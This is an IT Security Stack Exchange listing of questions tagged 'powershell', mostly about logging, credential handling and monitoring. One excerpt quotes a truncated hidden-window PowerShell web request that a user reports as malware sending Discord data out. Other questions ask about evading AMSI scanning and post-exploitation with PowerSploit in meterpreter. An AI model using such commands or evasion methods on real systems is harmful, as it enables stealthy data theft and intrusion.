IT Security Stack Exchange
IT Security Stack Exchange

Questions tagged [powershell]

task automation and configuration management CLI for Windows, the first release was in Windows XP SP2 in 2006

PowerShell is a CLI on Windows like CMD but it has enhanced functionality, since it was build up to create management scripts and automate system tasks.

89 questions
1
vote
0 answers

How should you configure PowerShell logs permissions?

I'm currently trying to figure out the best way to configure Windows PowerShell logging, so that it is secure (Attackers cannot gain sensitive data out of it) it helps in DFIR (digital forensic and incident response) cases The CIS Benchmark for…
Ville
  • 19
  • 3
1
vote
2 answers

Insider threat mitigation sql databases

I support a number of applications some of which have sql databases. There's a number of scripts (mostly powershell/bash) to check the state of an application to see if it's considered healthy. Some of these scripts make calls out to the sql…
bain2236
  • 47
  • 5
1
vote
1 answer

What is this PowerShell script sending Discord info to random server?

Upon turning on my personal Windows 10 computer tonight, I was greeted with ConEmu telling me that two PowerShell commands were run at startup. Both commands were the same thing: powershell -windowstyle hidden -Command "& {&invoke-webrequest -method…
Mike Boch
  • 11
  • 1
1
vote
0 answers

How do use ArcSight ESM to monitor powershell logs?

I have read mixed reviews, our team within our DoD sector suggest that ingestion the logs directly into the SIEM platform would be best and I feel that having a third party tool with signatures, look at the event and determine if was malicious and…
md154199
  • 11
  • 1
1
vote
4 answers

why do I get an email with address of Me'.exe'

I am wondering if there is a security issue with this. I use Mozilla, and I got an email with Me, '.exe' . I have never seen this. What is it? Is it a way to send mass email? I searched online, and it has something to do with…
Sam
  • 11
  • 2
1
vote
0 answers

Are the interactive methods of credential gathering listed here actually secure, since they dont store the credentials on disk?

I found an article about different ways to collect and pass credentials in powershell. The author states that some of these methods are 100% secure (which is obviously an exaderation) but for purposes of running a short interactive powershell…
leeand00
  • 1,297
  • 1
  • 13
  • 21
1
vote
0 answers

How can I safely use Get-Credential to obtain a username and password for a set period of time for use as command line arguments?

Credentials in the form of SSH keys can be stored in memory using SSH Agent; However, if clicking the wrong link, or running a malicious program they can also be snatched from memory and sent somewhere else; which is why ssh-add offers the -t…
leeand00
  • 1,297
  • 1
  • 13
  • 21
1
vote
3 answers

How can I track executed PowerShell commands within a network?

I wanto to track PowerShell commands which are executed by users in the intranet. How can I do this? I need the user's information and their executed commands. Is it possible? Edit 1: I guess I can use; Set-PSDebug -Trace 1 How can I build a script…
Umut Gür
  • 111
  • 1
  • 1
  • 4
1
vote
1 answer

Give users a powershell script to run - Secure?

Is there a secure and practical way to give a group of users a powershell script to run on their laptops? The users all have active directory accounts, but their computers are not joined to any domain. The end goal is to get a basic hardware…
whitneyland
  • 153
  • 5
1
vote
1 answer

Is it possible to export user account certificates remotely with NTLM hash authentication?

The EFS encryption uses user certificate, generated with his username and password, to encrypt the files so that only that user can access it. My question is this: Can you export user certificates remotely(using PowerShell) authenticating with NTLM…
Guesttt
  • 31
  • 1
  • 2
1
vote
1 answer

Store a text in encrypted form and use in powershell script without compromising it to other users?

I want to encrypt a text which I want to use in different PowerShell script without compromising its security as other user will be using scripts that will contain that text. Basically I want to conceal that text from everybody and use it without…
Ankit
  • 11
  • 1
1
vote
1 answer

In Windows, what's the difference between enumerating logged on users vs sessions?

I'm reading over PowerView.ps1, part of PowerSploit, and I'm wondering: what's the difference between sessions and logged on users? Get-NetLoggedon (which uses the NetWkstaUserEnum Win32 API call, and requires local admin rights) always seems to…
Sean W.
  • 835
  • 4
  • 14
1
vote
0 answers

Does running a PowerShell script using an embedded System.Managment.Automation DLL prevent it from being scanned by AMSI?

A new feature called Antimalware Scan Interface, that allow AVs to 'see' Powershell commands executed, was introduced in Powershell v5. According to adsecurity, this feature seems to rely on the system-wide System.Management.Automation.dll…
cgcmake
  • 488
  • 1
  • 4
  • 8
1
vote
1 answer

Is it always safe to type [i.e. run Get-Content] on a file in PowerShell?

Supposedly an attacker sends me a malicious readme.txt and I'm going to open PowerShell and run type readme.txt. Can the attacker via any sort of control char sequences or using any other technique cause a non-expected behavior this way?
bohdan_trotsenko
  • 123
  • 5
1
vote
3 answers

Powershell scripts inside meterpreter sessions

I have aquestion i tried to answer myself without much success. I love all the powershell script provided for post exploitation purposes -> Powersploit; Nishang etc... My only problem is that i can't find any easy way to use them inside a…
r4ym0nd PenTester
  • 397
  • 1
  • 6
  • 12
1 2 3
4
5 6